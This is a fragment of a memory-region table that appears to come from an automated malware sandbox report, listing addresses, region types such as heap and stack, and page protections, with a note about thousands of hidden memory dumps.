page read and write
7FFD9BA90000
trusted library allocation
page execute and read and write
406000
unkown
page readonly
3773000
heap
page read and write
AF0000
heap
page read and write
93D000
heap
page read and write
8AF000
stack
page read and write
7CB000
heap
page read and write
37C7000
heap
page read and write
F14000
unkown
page execute and read and write
802000
heap
page read and write
4540000
trusted library allocation
page read and write
4611000
heap
page read and write
A29000
heap
page read and write
3774000
heap
page read and write
37B3000
heap
page read and write
3765000
heap
page read and write
7FFD9BB50000
trusted library allocation
page read and write
7CB000
heap
page read and write
830000
heap
page read and write
4841000
heap
page read and write
35C1000
trusted library allocation
page read and write
A0E000
heap
page read and write
37B8000
heap
page read and write
4A60000
direct allocation
page execute and read and write
7A6000
heap
page read and write
7FFD9B9B4000
trusted library allocation
page read and write
1900000
heap
page read and write
44BF000
stack
page read and write
1A0000
heap
page read and write
7CB000
heap
page read and write
There are 3044 hidden memdumps, click here to show them.